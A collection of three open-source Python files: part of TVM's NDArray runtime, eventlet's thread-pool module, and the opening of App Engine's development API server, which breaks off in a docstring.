        # Hash on the underlying handle address: equality is identity (same_as).
        return ctypes.cast(self.handle, ctypes.c_void_p).value

    def __eq__(self, other):
        return self.same_as(other)

    def __ne__(self, other):
        return not self.__eq__(other)

    def same_as(self, other):
        """Check object identity equality

        Parameters
        ----------
        other : object
            The other object to compare to

        Returns
        -------
        same : bool
            Whether other is same as self.
        """
        if not isinstance(other, NDArrayBase):
            return False
        return self.__hash__() == other.__hash__()

    def __setitem__(self, in_slice, value):
        """Set ndarray value"""
        # Only whole-array assignment (arr[:] = x) is supported.
        if (
            not isinstance(in_slice, slice)
            or in_slice.start is not None
            or in_slice.stop is not None
        ):
            raise ValueError("Array only support set from numpy array")
        if isinstance(value, NDArrayBase):
            if value.handle is not self.handle:
                value.copyto(self)
        elif isinstance(value, (np.ndarray, np.generic)):
            self.copyfrom(value)
        else:
            raise TypeError("type %s not supported" % str(type(value)))

    def copyfrom(self, source_array):
        """Perform an synchronize copy from the array.

        Parameters
        ----------
        source_array : array_like
            The data source we should like to copy from.

        Returns
        -------
        arr : NDArray
            Reference to self.
        """
        if isinstance(source_array, NDArrayBase):
            source_array.copyto(self)
            return self
        if not isinstance(source_array, np.ndarray):
            try:
                source_array = np.array(source_array, dtype=self.dtype)
            # FIX: a bare `except:` also swallowed KeyboardInterrupt/SystemExit.
            except Exception:
                raise TypeError(
                    "array must be an array_like data,"
                    + "type %s is not supported" % str(type(source_array))
                )
        t = DataType(self.dtype)
        shape, dtype = self.shape, self.dtype
        # Vector types (lanes > 1) are exposed to numpy as an extra
        # trailing dimension of scalar elements.
        if t.lanes > 1:
            shape = shape + (t.lanes,)
            t.lanes = 1
            dtype = str(t)
        if source_array.shape != shape:
            raise ValueError(
                "array shape do not match the shape of NDArray {0} vs {1}".format(
                    source_array.shape, shape
                )
            )
        numpy_str_map = DataType.NUMPY2STR
        np_dtype_str = (
            numpy_str_map[source_array.dtype]
            if source_array.dtype in numpy_str_map
            else str(source_array.dtype)
        )
        # Make the source contiguous and dtype-matched before the raw byte
        # copy; bfloat16 has no numpy dtype, so its bits travel as uint16.
        if (not source_array.flags["C_CONTIGUOUS"]) or (
            dtype == "bfloat16" or dtype != np_dtype_str
        ):
            source_array = np.ascontiguousarray(
                source_array, dtype="uint16" if dtype == "bfloat16" else dtype
            )
        assert source_array.flags["C_CONTIGUOUS"]
        data = source_array.ctypes.data_as(ctypes.c_void_p)
        nbytes = ctypes.c_size_t(source_array.size * source_array.dtype.itemsize)
        check_call(_LIB.TVMArrayCopyFromBytes(self.handle, data, nbytes))
        return self

    def __repr__(self):
        res = "<tvm.nd.NDArray shape={0}, {1}>\n".format(self.shape, self.device)
        res += self.numpy().__repr__()
        return res

    def __str__(self):
        return str(self.numpy())

    def asnumpy(self):
        """Convert this array to numpy array. This API will be deprecated in TVM v0.8 release.
        Please use `numpy` instead."""
        warnings.warn(
            "NDArray.asnumpy() will be deprecated in TVM v0.8 release. "
            "Please use NDArray.numpy() instead.",
            DeprecationWarning,
        )
        return self.numpy()

    def numpy(self):
        """Convert this array to numpy array

        Returns
        -------
        np_arr : numpy.ndarray
            The corresponding numpy array.
        """
        t = DataType(self.dtype)
        shape, dtype = self.shape, self.dtype
        old_dtype = dtype
        if t.lanes > 1:
            shape = shape + (t.lanes,)
            t.lanes = 1
            dtype = str(t)
        if dtype == "int4":
            # int4 values are packed two-per-byte; copy as int8 and unpack below.
            dtype = "int8"
        np_arr = np.empty(shape, dtype=dtype)
        assert np_arr.flags["C_CONTIGUOUS"]
        data = np_arr.ctypes.data_as(ctypes.c_void_p)
        nbytes = ctypes.c_size_t(np_arr.size * np_arr.dtype.itemsize)
        check_call(_LIB.TVMArrayCopyToBytes(self.handle, data, nbytes))
        if old_dtype == "int4":
            # Split each byte into its low and high nibbles: even output
            # indices come from the high nibble, odd from the low nibble.
            length = np_arr.size
            np_arr_ret = np.empty((length,), dtype="int8")
            np_arr = np_arr.reshape((length,))
            old_index = np.bitwise_and(np_arr, 0x0F)
            even_index = np.bitwise_and(np_arr >> 4, 0x0F)
            np_arr_ret[1::2] = old_index[0 : length // 2]
            np_arr_ret[0::2] = even_index[0 : length // 2]
            return np_arr_ret.reshape(shape)
        return np_arr

    def copyto(self, target):
        """Copy array to target

        Parameters
        ----------
        target : NDArray
            The target array to be copied, must have same shape as this array.
        """
        if isinstance(target, NDArrayBase):
            return self._copyto(target)
        if isinstance(target, Device):
            # Allocate a fresh array on the requested device, then copy.
            res = empty(self.shape, self.dtype, target)
            return self._copyto(res)
        raise ValueError("Unsupported target type %s" % str(type(target)))
def device(dev_type, dev_id=0):
    """Construct a TVM device with given device type and id.

    Parameters
    ----------
    dev_type: int or str
        The device type mask or name of the device.

    dev_id : int, optional
        The integer device id

    Returns
    -------
    dev: tvm.runtime.Device
        The corresponding device.

    Examples
    --------
    Device can be used to create reflection of device by
    string representation of the device type.

    .. code-block:: python

      assert tvm.device("cpu", 1) == tvm.cpu(1)
      assert tvm.device("cuda", 0) == tvm.cuda(0)
    """
    if isinstance(dev_type, string_types):
        # Only the leading token matters, e.g. "cuda -arch=sm_70" -> "cuda".
        name = dev_type.split()[0]
        mask = Device.STR2MASK.get(name)
        if mask is None:
            raise ValueError("Unknown device type %s" % name)
        dev_type = mask
    return Device(dev_type, dev_id)
def numpyasarray(np_data):
    """Return a TVMArray representation of a numpy array.

    Returns (arr, shape_c); the caller must keep shape_c alive as long as
    arr is used, since arr.shape points into it.
    """
    assert np_data.flags["C_CONTIGUOUS"]
    shape_c = c_array(tvm_shape_index_t, np_data.shape)
    arr = TVMArray()
    arr.data = np_data.ctypes.data_as(ctypes.c_void_p)
    arr.shape = shape_c
    arr.strides = None
    arr.dtype = DataType(np.dtype(np_data.dtype).name)
    arr.ndim = np_data.ndim
    arr.device = device(1, 0)  # CPU device
    return arr, shape_c
def empty(shape, dtype="float32", device=device(1, 0), mem_scope=None):
    """Create an empty array given shape and device

    Parameters
    ----------
    shape : tuple of int
        The shape of the array.

    dtype : type or str
        The data type of the array.

    device : Device
        The device of the array.

    mem_scope : Optional[str]
        The memory scope of the array.

    Returns
    -------
    arr : tvm.nd.NDArray
        The array tvm supported.
    """
    # Coerce every dimension (IntImm or plain number) to a Python int.
    dims = [s.value if isinstance(s, tvm.tir.IntImm) else int(s) for s in shape]
    # Pass the shape to the FFI as a raw int64 pointer.
    shape_arr = np.array(dims, "int64")
    ptr = shape_arr.ctypes.data_as(ctypes.POINTER(ctypes.c_int64))
    shape_ptr = ctypes.cast(ptr, ctypes.c_void_p)
    return _ffi_api.TVMArrayAllocWithScope(
        shape_ptr, len(dims), DataType(dtype), device, mem_scope
    )
def from_dlpack(dltensor):
    """Produce an array from a DLPack capsule or an object with __dlpack__, w/o memory copy.

    Retrieves the underlying DLPack tensor's pointer to create an array from
    the data. The original DLPack tensor's destructor is removed, as the new
    array takes over responsibility for destruction.

    Parameters
    ----------
    dltensor : object with __dlpack__ attribute or a DLPack capsule

    Returns
    -------
    arr: tvm.nd.NDArray
        The array view of the tensor data.
    """
    kind = type(dltensor)
    # A raw capsule is consumed directly.
    if kind.__module__ == "builtins" and kind.__name__ == "PyCapsule":
        return _from_dlpack(dltensor)
    # Otherwise ask the producer for a capsule via the DLPack protocol.
    if hasattr(dltensor, "__dlpack__"):
        return _from_dlpack(dltensor.__dlpack__())
    raise AttributeError("Required attribute __dlpack__ not found")
def cpu(dev_id=0):
    """Construct a CPU device.

    Parameters
    ----------
    dev_id : int, optional
        The integer device id.

    Returns
    -------
    dev : Device
        The created CPU device.
    """
    return Device(1, dev_id)
def cuda(dev_id=0):
    """Construct a CUDA GPU device.

    Parameters
    ----------
    dev_id : int, optional
        The integer device id.

    Returns
    -------
    dev : Device
        The created CUDA device.
    """
    return Device(2, dev_id)
def gpu(dev_id=0):
    """Construct a CUDA GPU device (deprecated alias).

    deprecated:: 0.9.0
        Use :py:func:`tvm.cuda` instead.

    Parameters
    ----------
    dev_id : int, optional
        The integer device id.

    Returns
    -------
    dev : Device
        The created CUDA device.
    """
    # Warn callers toward the replacement API before handing back the device.
    warnings.warn(
        "Please use tvm.cuda() instead of tvm.gpu(). tvm.gpu() is going to be deprecated in 0.9.0",
    )
    return Device(2, dev_id)
def rocm(dev_id=0):
    """Construct a ROCM device.

    Parameters
    ----------
    dev_id : int, optional
        The integer device id.

    Returns
    -------
    dev : Device
        The created ROCm device.
    """
    return Device(10, dev_id)
def opencl(dev_id=0):
    """Construct a OpenCL device.

    Parameters
    ----------
    dev_id : int, optional
        The integer device id.

    Returns
    -------
    dev : Device
        The created OpenCL device.
    """
    return Device(4, dev_id)
def metal(dev_id=0):
    """Construct a metal device.

    Parameters
    ----------
    dev_id : int, optional
        The integer device id.

    Returns
    -------
    dev : Device
        The created Metal device.
    """
    return Device(8, dev_id)
def vpi(dev_id=0):
    """Construct a VPI simulated device.

    Parameters
    ----------
    dev_id : int, optional
        The integer device id.

    Returns
    -------
    dev : Device
        The created VPI device.
    """
    return Device(9, dev_id)
def vulkan(dev_id=0):
    """Construct a Vulkan device.

    Parameters
    ----------
    dev_id : int, optional
        The integer device id.

    Returns
    -------
    dev : Device
        The created Vulkan device.
    """
    return Device(7, dev_id)
def ext_dev(dev_id=0):
    """Construct a extension device.

    Parameters
    ----------
    dev_id : int, optional
        The integer device id.

    Returns
    -------
    dev : Device
        The created extension device.

    Note
    ----
    This API is reserved for quick testing of new
    device by plugin device API as ext_dev.
    """
    return Device(12, dev_id)
def hexagon(dev_id=0):
    """Construct a Hexagon device.

    Parameters
    ----------
    dev_id : int, optional
        The integer device id.

    Returns
    -------
    dev : Device
        The created Hexagon device.
    """
    return Device(14, dev_id)
def webgpu(dev_id=0):
    """Construct a webgpu device.

    Parameters
    ----------
    dev_id : int, optional
        The integer device id.

    Returns
    -------
    dev : Device
        The created WebGPU device.
    """
    return Device(15, dev_id)
cl = opencl
mtl = metal
def array(arr, device=cpu(0)):
    """Create an array from source arr.

    Parameters
    ----------
    arr : numpy.ndarray
        The array to be copied from

    device : Device, optional
        The device to create the array on

    Returns
    -------
    ret : NDArray
        The created array
    """
    # tvm.ir.container.Array is a compiler-side container, not tensor data.
    if isinstance(arr, tvm.ir.container.Array):
        raise AttributeError("arr is an instance of", type(arr))
    # Coerce anything that is not already an ndarray/NDArray through numpy.
    if not isinstance(arr, (np.ndarray, NDArray)):
        arr = np.array(arr)
    return empty(arr.shape, arr.dtype, device).copyfrom(arr)
# Register back to FFI
_set_class_ndarray(NDArray)
| |
# Copyright (c) 2007-2009, Linden Research, Inc.
# Copyright (c) 2007, IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import imp
import os
import sys
from eventlet import event
from eventlet import greenio
from eventlet import greenthread
from eventlet import patcher
# Grab the un-monkeypatched threading/Queue modules so the worker threads
# below are real OS threads communicating over a real (blocking) queue.
threading = patcher.original('threading')
Queue_module = patcher.original('Queue')
Queue = Queue_module.Queue
Empty = Queue_module.Empty
__all__ = ['execute', 'Proxy', 'killall']
# When False, exceptions re-raised by execute() also print a traceback.
QUIET=True
# Read/write ends of the wakeup pipe; created lazily by setup().
_rfile = _wfile = None
# The single byte written to wake the green-side trampoline.
_bytetosend = ' '.encode()
def _signal_t2e():
    """Wake the green-side trampoline by writing one byte to the pipe."""
    pipe = _wfile
    pipe.write(_bytetosend)
    pipe.flush()
# Response queue shared by all worker threads; created by setup().
_rspq = None
def tpool_trampoline():
    """Green-side pump: deliver worker-thread results to waiting greenthreads.

    Runs as a greenthread.  Blocks cooperatively on the wakeup pipe until a
    worker signals (via _signal_t2e) that results are in _rspq, then drains
    the queue, sending each (event, return-value) pair to the Event that the
    corresponding execute() call is waiting on.
    """
    global _rspq
    while(True):
        try:
            # One byte is written per signal; read blocks the hub cooperatively.
            _c = _rfile.read(1)
            assert _c
        except ValueError:
            break  # will be raised when pipe is closed
        while not _rspq.empty():
            try:
                (e,rv) = _rspq.get(block=False)
                e.send(rv)
                rv = None  # drop the reference promptly
            except Empty:
                pass
# Exceptions that must propagate in the worker thread rather than being
# captured and shipped back to the calling greenthread.
SYS_EXCS = (KeyboardInterrupt, SystemExit)
def tworker(reqq):
    """Native worker-thread loop: execute requests arriving on *reqq*.

    Each message is (event, method, args, kwargs).  The method's return
    value -- or its captured sys.exc_info() if it raised -- is pushed onto
    _rspq and the green side is woken via the pipe.  A None message is the
    shutdown sentinel.
    """
    global _rspq
    while(True):
        try:
            msg = reqq.get()
        except AttributeError:
            return  # can't get anything off of a dud queue
        if msg is None:
            return
        (e,meth,args,kwargs) = msg
        rv = None
        try:
            rv = meth(*args,**kwargs)
        except SYS_EXCS:
            raise
        except Exception:
            # Ship the full exc_info triple back so execute() can re-raise.
            rv = sys.exc_info()
        # test_leakage_from_tracebacks verifies that the use of
        # exc_info does not lead to memory leaks
        _rspq.put((e,rv))
        # Clear locals to break reference cycles (traceback -> frame -> locals).
        meth = args = kwargs = e = rv = None
        _signal_t2e()
def execute(meth,*args, **kwargs):
    """
    Execute *meth* in a Python thread, blocking the current coroutine/
    greenthread until the method completes.
    The primary use case for this is to wrap an object or module that is not
    amenable to monkeypatching or any of the other tricks that Eventlet uses
    to achieve cooperative yielding. With tpool, you can force such objects to
    cooperate with green threads by sticking them in native threads, at the cost
    of some overhead.

    Returns meth's return value; if meth raised, the exception is re-raised
    here in the calling greenthread.
    """
    setup()
    # if already in tpool, don't recurse into the tpool
    # also, call functions directly if we're inside an import lock, because
    # if meth does any importing (sadly common), it will hang
    # NOTE(review): _threads holds (queue, thread) tuples, so the membership
    # test below can never match a bare thread object -- verify intent.
    my_thread = threading.currentThread()
    if my_thread in _threads or imp.lock_held() or _nthreads == 0:
        return meth(*args, **kwargs)
    cur = greenthread.getcurrent()
    # a mini mixing function to make up for the fact that hash(greenlet) doesn't
    # have much variability in the lower bits
    k = hash(cur)
    k = k + 0x2c865fd + (k >> 5)
    k = k ^ 0xc84d1b7 ^ (k >> 7)
    thread_index = k % _nthreads
    reqq, _thread = _threads[thread_index]
    e = event.Event()
    reqq.put((e,meth,args,kwargs))
    # Cooperatively block until the worker sends the result via the trampoline.
    rv = e.wait()
    # A 3-tuple with an Exception in the middle is a captured sys.exc_info()
    # from the worker: re-raise it in this greenthread.
    if isinstance(rv,tuple) and len(rv) == 3 and isinstance(rv[1],Exception):
        import traceback
        (c,e,tb) = rv
        if not QUIET:
            traceback.print_exception(c,e,tb)
            traceback.print_stack()
        raise c,e,tb
    return rv
def proxy_call(autowrap, f, *args, **kwargs):
    """
    Call a function *f* and returns the value. If the type of the return value
    is in the *autowrap* collection, then it is wrapped in a :class:`Proxy`
    object before return.
    Normally *f* will be called in the threadpool with :func:`execute`; if the
    keyword argument "nonblocking" is set to ``True``, it will simply be
    executed directly. This is useful if you have an object which has methods
    that don't need to be called in a separate thread, but which return objects
    that should be Proxy wrapped.
    """
    run_directly = kwargs.pop('nonblocking', False)
    if run_directly:
        result = f(*args, **kwargs)
    else:
        result = execute(f, *args, **kwargs)
    if isinstance(result, autowrap):
        return Proxy(result, autowrap)
    return result
class Proxy(object):
    """
    a simple proxy-wrapper of any object that comes with a
    methods-only interface, in order to forward every method
    invocation onto a thread in the native-thread pool. A key
    restriction is that the object's methods should not switch
    greenlets or use Eventlet primitives, since they are in a
    different thread from the main hub, and therefore might behave
    unexpectedly. This is for running native-threaded code
    only.
    It's common to want to have some of the attributes or return
    values also wrapped in Proxy objects (for example, database
    connection objects produce cursor objects which also should be
    wrapped in Proxy objects to remain nonblocking). *autowrap*, if
    supplied, is a collection of types; if an attribute or return
    value matches one of those types (via isinstance), it will be
    wrapped in a Proxy. *autowrap_names* is a collection
    of strings, which represent the names of attributes that should be
    wrapped in Proxy objects when accessed.
    """
    def __init__(self, obj,autowrap=(), autowrap_names=()):
        # _obj is the wrapped target; the autowrap settings are described in
        # the class docstring.
        self._obj = obj
        self._autowrap = autowrap
        self._autowrap_names = autowrap_names
    def __getattr__(self,attr_name):
        # Non-callable attributes are returned immediately (re-wrapped if the
        # autowrap rules apply); callables are wrapped in a closure that
        # defers the actual call to the threadpool via proxy_call().
        f = getattr(self._obj,attr_name)
        if not hasattr(f, '__call__'):
            if (isinstance(f, self._autowrap) or
                attr_name in self._autowrap_names):
                return Proxy(f, self._autowrap)
            return f
        def doit(*args, **kwargs):
            # Execute in the pool, then apply the name-based wrapping rule.
            result = proxy_call(self._autowrap, f, *args, **kwargs)
            if attr_name in self._autowrap_names and not isinstance(result, Proxy):
                return Proxy(result)
            return result
        return doit
    # the following are a buncha methods that the python interpreter
    # doesn't use getattr to retrieve and therefore have to be defined
    # explicitly
    def __getitem__(self, key):
        return proxy_call(self._autowrap, self._obj.__getitem__, key)
    def __setitem__(self, key, value):
        return proxy_call(self._autowrap, self._obj.__setitem__, key, value)
    def __deepcopy__(self, memo=None):
        return proxy_call(self._autowrap, self._obj.__deepcopy__, memo)
    def __copy__(self, memo=None):
        return proxy_call(self._autowrap, self._obj.__copy__, memo)
    def __call__(self, *a, **kw):
        if '__call__' in self._autowrap_names:
            return Proxy(proxy_call(self._autowrap, self._obj, *a, **kw))
        else:
            return proxy_call(self._autowrap, self._obj, *a, **kw)
    # these don't go through a proxy call, because they're likely to
    # be called often, and are unlikely to be implemented on the
    # wrapped object in such a way that they would block
    def __eq__(self, rhs):
        return self._obj == rhs
    def __hash__(self):
        return self._obj.__hash__()
    def __repr__(self):
        return self._obj.__repr__()
    def __str__(self):
        return self._obj.__str__()
    def __len__(self):
        return len(self._obj)
    def __nonzero__(self):
        # Python 2 truth-value protocol (__bool__ in Python 3).
        return bool(self._obj)
    def __iter__(self):
        # If the object is its own iterator, iterate through this Proxy so
        # next() keeps going through the pool; otherwise wrap the fresh
        # iterator in its own Proxy.
        it = iter(self._obj)
        if it == self._obj:
            return self
        else:
            return Proxy(it)
    def next(self):
        # Python 2 iterator protocol (__next__ in Python 3).
        return proxy_call(self._autowrap, self._obj.next)
# Number of native worker threads; overridable via the environment.
_nthreads = int(os.environ.get('EVENTLET_THREADPOOL_SIZE', 20))
_threads = []  # list of (request_queue, thread) pairs, populated by setup()
_coro = None  # the tpool_trampoline greenthread
_setup_already = False  # guards setup() against re-initialization
def setup():
    """Create the wakeup pipe, response queue, worker threads and the
    trampoline greenthread.  Idempotent: later calls return immediately.
    """
    global _rfile, _wfile, _threads, _coro, _setup_already, _rspq
    if _setup_already:
        return
    else:
        _setup_already = True
    try:
        _rpipe, _wpipe = os.pipe()
        _wfile = greenio.GreenPipe(_wpipe, 'wb', 0)
        _rfile = greenio.GreenPipe(_rpipe, 'rb', 0)
    except (ImportError, NotImplementedError):
        # This is Windows compatibility -- use a socket instead of a pipe because
        # pipes don't really exist on Windows.
        import socket
        from eventlet import util
        sock = util.__original_socket__(socket.AF_INET, socket.SOCK_STREAM)
        sock.bind(('localhost', 0))
        sock.listen(50)
        csock = util.__original_socket__(socket.AF_INET, socket.SOCK_STREAM)
        csock.connect(('localhost', sock.getsockname()[1]))
        nsock, addr = sock.accept()
        _rfile = greenio.GreenSocket(csock).makefile('rb', 0)
        _wfile = nsock.makefile('wb',0)
    _rspq = Queue(maxsize=-1)  # unbounded response queue
    assert _nthreads >= 0, "Can't specify negative number of threads"
    if _nthreads == 0:
        import warnings
        warnings.warn("Zero threads in tpool. All tpool.execute calls will\
 execute in main thread. Check the value of the environment \
variable EVENTLET_THREADPOOL_SIZE.", RuntimeWarning)
    # One request queue per worker; execute() picks a queue by hashing the
    # calling greenthread.
    for i in xrange(_nthreads):
        reqq = Queue(maxsize=-1)
        t = threading.Thread(target=tworker,
                             name="tpool_thread_%s" % i,
                             args=(reqq,))
        t.setDaemon(True)  # don't keep the interpreter alive at exit
        t.start()
        _threads.append((reqq, t))
    _coro = greenthread.spawn_n(tpool_trampoline)
def killall():
    """Tear the pool down: stop workers, kill the trampoline, close the
    wakeup pipe, and reset module state so setup() can run again.
    """
    global _setup_already, _rspq, _rfile, _wfile
    if not _setup_already:
        return
    for reqq, _ in _threads:
        reqq.put(None)  # None is the shutdown sentinel understood by tworker
    for _, thr in _threads:
        thr.join()
    del _threads[:]
    if _coro is not None:
        greenthread.kill(_coro)
    _rfile.close()
    _wfile.close()
    _rfile = None
    _wfile = None
    _rspq = None
    _setup_already = False
| |
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Serves the stub App Engine APIs (e.g. memcache, datastore) over HTTP.
The Remote API protocol is used for communication.
"""
import logging
import os
import pickle
import shutil
import socket
import sys
import tempfile
import threading
import time
import traceback
import urllib2
import urlparse
import google
import yaml
# Stubs
from google.appengine.api import datastore_file_stub
from google.appengine.api import mail_stub
from google.appengine.api import urlfetch_stub
from google.appengine.api import user_service_stub
from google.appengine.api.app_identity import app_identity_stub
from google.appengine.api.blobstore import blobstore_stub
from google.appengine.api.blobstore import file_blob_storage
from google.appengine.api.capabilities import capability_stub
from google.appengine.api.channel import channel_service_stub
from google.appengine.api.files import file_service_stub
from google.appengine.api.logservice import logservice_stub
from google.appengine.api.search import simple_search_stub
from google.appengine.api.taskqueue import taskqueue_stub
from google.appengine.api.prospective_search import prospective_search_stub
from google.appengine.api.memcache import memcache_stub
from google.appengine.api.modules import modules_stub
from google.appengine.api.remote_socket import _remote_socket_stub
from google.appengine.api.system import system_stub
from google.appengine.api.xmpp import xmpp_service_stub
from google.appengine.datastore import datastore_sqlite_stub
from google.appengine.datastore import datastore_stub_util
from google.appengine.datastore import datastore_v4_pb
from google.appengine.datastore import datastore_v4_stub
from google.appengine.api import apiproxy_stub_map
from google.appengine.api import datastore
from google.appengine.ext.remote_api import remote_api_pb
from google.appengine.ext.remote_api import remote_api_services
from google.appengine.runtime import apiproxy_errors
from google.appengine.tools.devappserver2 import wsgi_server
# TODO: Remove this lock when stubs have been audited for thread
# safety.
# Serializes calls into any stub that does not declare itself THREADSAFE
# (see _execute_request below).
GLOBAL_API_LOCK = threading.RLock()
# We don't want to support datastore_v4 everywhere, because users are supposed
# to use the Cloud Datastore API going forward, so we don't want to put these
# entries in remote_api_servers.SERVICE_PB_MAP. But for our own implementation
# of the Cloud Datastore API we need those methods to work when an instance
# issues them, specifically the DatstoreApiServlet running as a module inside
# the app we are running. The consequence is that other app code can also
# issue datastore_v4 API requests, but since we don't document these requests
# or export them through any language bindings this is unlikely in practice.
# Maps datastore_v4 method name -> (request PB class, response PB class).
_DATASTORE_V4_METHODS = {
    'AllocateIds': (datastore_v4_pb.AllocateIdsRequest,
                    datastore_v4_pb.AllocateIdsResponse),
    'BeginTransaction': (datastore_v4_pb.BeginTransactionRequest,
                         datastore_v4_pb.BeginTransactionResponse),
    'Commit': (datastore_v4_pb.CommitRequest,
               datastore_v4_pb.CommitResponse),
    'ContinueQuery': (datastore_v4_pb.ContinueQueryRequest,
                      datastore_v4_pb.ContinueQueryResponse),
    'Lookup': (datastore_v4_pb.LookupRequest,
               datastore_v4_pb.LookupResponse),
    'Rollback': (datastore_v4_pb.RollbackRequest,
                 datastore_v4_pb.RollbackResponse),
    'RunQuery': (datastore_v4_pb.RunQueryRequest,
                 datastore_v4_pb.RunQueryResponse),
}
def _execute_request(request):
  """Executes an API method call and returns the response object.
  Args:
    request: A remote_api_pb.Request object representing the API call e.g. a
        call to memcache.Get.
  Returns:
    A ProtocolBuffer.ProtocolMessage representing the API response e.g. a
    memcache_service_pb.MemcacheGetResponse.
  Raises:
    apiproxy_errors.CallNotFoundError: if the requested method doesn't exist.
    apiproxy_errors.ApplicationError: if the API method calls fails.
  """
  service = request.service_name()
  method = request.method()
  if request.has_request_id():
    request_id = request.request_id()
  else:
    logging.error('Received a request without request_id: %s', request)
    request_id = None
  # datastore_v4 is resolved through our private map; everything else comes
  # from the public remote_api service registry.
  service_methods = (_DATASTORE_V4_METHODS if service == 'datastore_v4'
                     else remote_api_services.SERVICE_PB_MAP.get(service, {}))
  # We do this rather than making a new map that is a superset of
  # remote_api_services.SERVICE_PB_MAP because that map is not initialized
  # all in one place, so we would have to be careful about where we made
  # our new map.
  request_class, response_class = service_methods.get(method, (None, None))
  if not request_class:
    raise apiproxy_errors.CallNotFoundError('%s.%s does not exist' % (service,
                                                                      method))
  request_data = request_class()
  request_data.ParseFromString(request.request())
  response_data = response_class()
  service_stub = apiproxy_stub_map.apiproxy.GetStub(service)
  def make_request():
    # Fills response_data in place.
    service_stub.MakeSyncCall(service,
                              method,
                              request_data,
                              response_data,
                              request_id)
  # If the service has not declared itself as threadsafe acquire
  # GLOBAL_API_LOCK.
  if service_stub.THREADSAFE:
    make_request()
  else:
    with GLOBAL_API_LOCK:
      make_request()
  return response_data
class APIServer(wsgi_server.WsgiServer):
  """Serves API calls over HTTP using the remote_api protocol."""
  def __init__(self, host, port, app_id):
    # app_id is echoed back to remote_api handshake GETs (_handle_GET).
    self._app_id = app_id
    self._host = host
    super(APIServer, self).__init__((host, port), self)
  def start(self):
    """Start the API Server."""
    super(APIServer, self).start()
    logging.info('Starting API server at: http://%s:%d', self._host, self.port)
  def quit(self):
    # Flush stub state (datastore, search, taskqueue) before shutting down.
    cleanup_stubs()
    super(APIServer, self).quit()
  def _handle_POST(self, environ, start_response):
    """Decode a remote_api request PB, execute it, return the response PB."""
    start_response('200 OK', [('Content-Type', 'application/octet-stream')])
    start_time = time.time()
    response = remote_api_pb.Response()
    try:
      request = remote_api_pb.Request()
      # NOTE: Exceptions encountered when parsing the PB or handling the request
      # will be propagated back to the caller the same way as exceptions raised
      # by the actual API call.
      if environ.get('HTTP_TRANSFER_ENCODING') == 'chunked':
        # CherryPy concatenates all chunks when 'wsgi.input' is read but v3.2.2
        # will not return even when all of the data in all chunks has been
        # read. See: https://bitbucket.org/cherrypy/cherrypy/issue/1131.
        wsgi_input = environ['wsgi.input'].read(2**32)
      else:
        wsgi_input = environ['wsgi.input'].read(int(environ['CONTENT_LENGTH']))
      request.ParseFromString(wsgi_input)
      api_response = _execute_request(request).Encode()
      response.set_response(api_response)
    except Exception, e:
      if isinstance(e, apiproxy_errors.ApplicationError):
        # Expected API-level failure: return the structured error payload.
        level = logging.DEBUG
        application_error = response.mutable_application_error()
        application_error.set_code(e.application_error)
        application_error.set_detail(e.error_detail)
      else:
        # If the runtime instance is not Python, it won't be able to unpickle
        # the exception so use level that won't be ignored by default.
        level = logging.ERROR
        # Even if the runtime is Python, the exception may be unpicklable if
        # it requires importing a class blocked by the sandbox so just send
        # back the exception representation.
        # But due to our use of the remote API, at least some apiproxy errors
        # are generated in the Dev App Server main instance and not in the
        # language runtime and wrapping them causes different behavior from
        # prod so don't wrap them.
        if not isinstance(e, apiproxy_errors.Error):
          e = RuntimeError(repr(e))
      # While not strictly necessary for ApplicationError, do this to limit
      # differences with remote_api:handler.py.
      response.set_exception(pickle.dumps(e))
      logging.log(level, 'Exception while handling %s\n%s', request,
                  traceback.format_exc())
    encoded_response = response.Encode()
    logging.debug('Handled %s.%s in %0.4f',
                  request.service_name(),
                  request.method(),
                  time.time() - start_time)
    return [encoded_response]
  def _handle_GET(self, environ, start_response):
    # remote_api handshake: echo the app id and the caller's rtok back.
    params = urlparse.parse_qs(environ['QUERY_STRING'])
    rtok = params.get('rtok', ['0'])[0]
    start_response('200 OK', [('Content-Type', 'text/plain')])
    return [yaml.dump({'app_id': self._app_id,
                       'rtok': rtok})]
  def __call__(self, environ, start_response):
    # WSGI entry point: route by HTTP method.
    if environ['REQUEST_METHOD'] == 'GET':
      return self._handle_GET(environ, start_response)
    elif environ['REQUEST_METHOD'] == 'POST':
      return self._handle_POST(environ, start_response)
    else:
      start_response('405 Method Not Allowed', [])
      return []
def setup_stubs(
    request_data,
    app_id,
    application_root,
    trusted,
    appidentity_email_address,
    appidentity_private_key_path,
    blobstore_path,
    datastore_consistency,
    datastore_path,
    datastore_require_indexes,
    datastore_auto_id_policy,
    images_host_prefix,
    logs_path,
    mail_smtp_host,
    mail_smtp_port,
    mail_smtp_user,
    mail_smtp_password,
    mail_enable_sendmail,
    mail_show_mail_body,
    mail_allow_tls,
    matcher_prospective_search_path,
    search_index_path,
    taskqueue_auto_run_tasks,
    taskqueue_default_http_server,
    user_login_url,
    user_logout_url,
    default_gcs_bucket_name):
  """Configures the APIs hosted by this server.
  Args:
    request_data: An apiproxy_stub.RequestInformation instance used by the
        stubs to lookup information about the request associated with an API
        call.
    app_id: The str application id e.g. "guestbook".
    application_root: The path to the directory containing the user's
        application e.g. "/home/joe/myapp".
    trusted: A bool indicating if privileged APIs should be made available.
    appidentity_email_address: Email address associated with a service account
        that has a downloadable key. May be None for no local application
        identity.
    appidentity_private_key_path: Path to private key file associated with
        service account (.pem format). Must be set if appidentity_email_address
        is set.
    blobstore_path: The path to the file that should be used for blobstore
        storage.
    datastore_consistency: The datastore_stub_util.BaseConsistencyPolicy to
        use as the datastore consistency policy.
    datastore_path: The path to the file that should be used for datastore
        storage.
    datastore_require_indexes: A bool indicating if the same production
        datastore indexes requirements should be enforced i.e. if True then
        a google.appengine.ext.db.NeedIndexError will be raised if a query
        is executed without the required indexes.
